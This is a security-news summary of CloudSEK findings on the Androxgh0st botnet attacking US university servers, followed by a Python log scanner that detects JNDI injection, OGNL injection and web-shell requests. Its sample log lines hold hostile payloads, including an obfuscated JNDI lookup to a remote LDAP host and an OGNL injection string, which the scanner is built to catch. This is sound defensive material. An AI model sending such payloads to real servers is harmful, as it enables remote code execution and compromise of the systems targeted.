Androxgh0st Botnet Expands Reach, Exploiting US University Servers

Recent CloudSEK findings show how the Androxgh0st botnet has evolved: it now targets academic institutions such as UC San Diego, achieving remote code execution (RCE) and planting web shells on compromised servers. The operators exploit vulnerabilities in widely used web frameworks and abuse legitimate domains to host or relay malicious activity, which is why the findings call for prompt patching and monitoring. #Androxgh0st #UCSD #CISA #JNDIInjection #ApacheShiro

Keypoints

  • The Androxgh0st botnet's set of attack methods has grown by roughly 50% since early 2024.
  • Academic institutions, including UC San Diego, have been targeted through misconfigured servers and legitimate but vulnerable domains.
  • The botnet exploits vulnerabilities in frameworks and platforms such as Apache Shiro, Spring, and WordPress plugins to gain initial access.
  • It uses JNDI injection and OGNL injection to achieve remote code execution and establish persistence.
  • Organizations are advised to patch affected systems, restrict network traffic, and monitor for suspicious activity.
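The last two keypoints name the techniques (JNDI and OGNL injection, web shells) and the advice (monitor for suspicious activity) but not how the two connect. The following is an added example, not code from CloudSEK, hackread or the Androxgh0st operators: three detection rules run over constructed web server access-log lines in the Apache/Nginx combined format. The payload patterns, the obfuscation handling and the log lines are all assumptions chosen to illustrate the techniques listed above; they are not indicators from the report.

```python
"""Flag Androxgh0st-style exploitation attempts in web server access logs.

Added example. The rule patterns below are assumptions based on the techniques
named in the keypoints (JNDI injection, OGNL injection, web shells), not
CloudSEK's indicators of compromise.
"""
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Constructed sample lines (combined log format); not real traffic from the incident.
SAMPLE_LOG = r"""
203.0.113.7 - - [10/Jan/2024:03:12:45 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2024:03:12:46 +0000] "GET /login?user=${jndi:ldap://198.51.100.9:1389/a} HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Jan/2024:03:13:01 +0000] "GET /shiro/index.action?id=%25%7B%28%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29%7D HTTP/1.1" 200 1043 "-" "curl/7.88"
198.51.100.23 - - [10/Jan/2024:03:14:09 +0000] "POST /wp-content/uploads/2024/01/shell.php HTTP/1.1" 200 88 "-" "python-requests/2.31"
203.0.113.7 - - [10/Jan/2024:03:14:30 +0000] "GET /api?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.9%3A1389%2Fx%7D HTTP/1.1" 500 0 "-" "Mozilla/5.0"
192.0.2.55 - - [10/Jan/2024:03:15:00 +0000] "GET /wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Parser for the Apache/Nginx combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Lookup-based obfuscation used to hide the literal "jndi", e.g. ${lower:j}ndi or ${::-j}ndi.
OBFUSCATION_RE = re.compile(r'\$\{(?:lower|upper):(\w)\}|\$\{::-(\w+)\}', re.I)

RULES = {
    # A JNDI lookup pointing at a remote scheme: the classic Log4Shell-style RCE vector.
    "jndi_injection": re.compile(
        r'\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|https?)', re.I),
    # OGNL expression markers: the Struts/Shiro-style expression-injection vector.
    "ognl_injection": re.compile(r'%\{|\(#|@ognl\.OgnlContext@|#_memberAccess', re.I),
}
# A POST to a script that lives in an upload or temp directory: a web shell being driven.
WEBSHELL_RE = re.compile(
    r'/(?:uploads?|tmp|temp|cache)/[^?]*\.(?:php\d?|phtml|jsp|jspx|aspx?)(?:$|\?)', re.I)


@dataclass(frozen=True)
class Finding:
    ip: str
    rule: str
    path: str


def normalize(s: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (attackers double-encode) and strip lookup obfuscation."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return OBFUSCATION_RE.sub(lambda m: m.group(1) or m.group(2), s)


def scan_line(line: str) -> list[Finding]:
    """Return every rule that fires on one log line (empty list if unparseable)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    ip, method, path = m["ip"], m["method"], normalize(m["path"])
    hits = [Finding(ip, name, path) for name, rx in RULES.items() if rx.search(path)]
    if method == "POST" and WEBSHELL_RE.search(path):
        hits.append(Finding(ip, "webshell_post", path))
    return hits


def scan_log(text: str) -> list[Finding]:
    return [f for line in text.splitlines() if line.strip() for f in scan_line(line)]


def ips_to_block(findings) -> list[str]:
    """Source addresses that triggered at least one rule, for a block list or alert."""
    return sorted({f.ip for f in findings})


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.rule:15} {f.ip:15} {f.path}")
    print("block:", ips_to_block(SAMPLE_LOG and scan_log(SAMPLE_LOG)))
```

Two points the sample is built to show: the OGNL payload only becomes recognisable after percent-decoding, and the second JNDI payload hides the keyword behind `${lower:j}`, so matching on the raw request line would miss both. Rules like these belong on the web tier where the decoded request is visible, and a hit on the web-shell rule should be treated as evidence that the earlier injection already succeeded, not as an attempt.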

Read More: https://hackread.com/androxgh0st-botnet-expand-exploit-us-university-servers/